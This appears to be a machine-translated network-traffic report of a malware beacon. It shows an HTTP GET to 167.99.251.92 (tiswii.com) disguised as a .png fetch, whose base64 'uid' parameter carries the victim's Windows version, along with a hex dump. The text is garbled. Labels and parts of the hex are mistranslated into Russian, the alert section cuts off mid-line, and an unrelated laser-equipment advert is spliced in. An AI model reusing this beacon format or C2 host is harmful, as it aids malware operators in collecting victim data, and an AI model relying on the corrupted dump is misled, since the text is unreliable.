167.99.251.92:80 (tiswii.com) ПОЛУЧИТЬ tiswii. com/wp-content/uploads/2020/03/up/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQ… GET /wp-content/uploads/2020/03/up/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1 Соединение: Keep-Alive Принимать: */* Accept-Language: en-us Агент пользователя: FoxKids Хост: tiswii.com Подробнее 9…<.'#....E.] 10 : 01 23 01 3D 40 00 80 06 A5 11 C0 A8 F0 1D A7 63 [.#[email protected]] 20 : FB 5C C0 0D 00 50 8F D3 A1 39 92 04 D9 11 50 18 [.\...P...9....P.] 30 : 01 00 39 89 00 00 47 45 54 20 2F 77 70 2D 63 6F [..9...GET /wp-co] 40 : 6E 74 65 6E 74 2F 75 70 6C 6F 61 64 73 2F 32 30 [ntent/uploads/20] 50 : 32 30 2F 30 33 2F 75 70 2F 34 34 34 34 34 34 2E [20/03/up/444444.] 60 : 70 6E 67 3F 75 69 64 3D 54 51 42 70 41 47 4D 41 [png?uid=TQBpAGMA] 70 : 63 67 42 76 41 48 4D 41 62 77 42 6D 41 48 51 41 [cgBvAHMAbwBmAHQA] 80 : 4941 42 58 41 47 6B 41 62 67 42 6B 41 47 38 41 [IABXAGkAbgBkAG8A] 90 : 64 77 42 7А 41 43 41 41 4Е 77 41 67 41 46 41 41 [dwBzACAANwAgAFAA] A0 : 63 67 42 76 41 47 59 41 5А 51 42 7А 41 48 4D 41 [cgBvAGYAZQBzAHMA] B0 : 61 51 42 76 41 47 34 41 59 51 42 73 41 43 41 41 [aQBvAG4AYQBsACAA] C0: 20 48 54 54 50 2F 31 2E 31 0D 0A 43 6F 6E 6E 65 [ HTTP/1. 1..Conne] D0: 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 [действие: Keep-Aliv] E0 : 65 0D 0A 41 63 63 65 70 74 3A 20 2A 2F 2A 0D 0A [e..Accept: */*..] F0 : 41 63 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A [Accept-Language:] 100 : 20 65 6E 2D 75 73 0D 0A 55 73 65 72 2D 41 67 65 [en-us..User-Age] 110 : 6Е 74 3А 20 46 6F 78 4В 6964 73 0D 0A 48 6F 73 [nt: FoxKids..Hos] 120 : 74 3A 20 74 69 73 77 69 69 2E 63 6F 6D 0D 0A 0D [t: tiswii.com…] 130 : 0А [.]
Формат Детали
Запрос GET /wp-content/uploads/2020/03/up/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: FoxKids
Хост: tiswii. com
Необработанный шестигранник

Предупреждения Suricata

Событие Категория Описание СИД
местный -> 167.
Лами гелиос флебо 3 отзывы: Лазерный комплекс для флебологии «Гелиос-Флебо III», Россия › купить, цена в Москве, оптом и в розницу

Добавить комментарий

Ваш адрес email не будет опубликован.

Пролистать наверх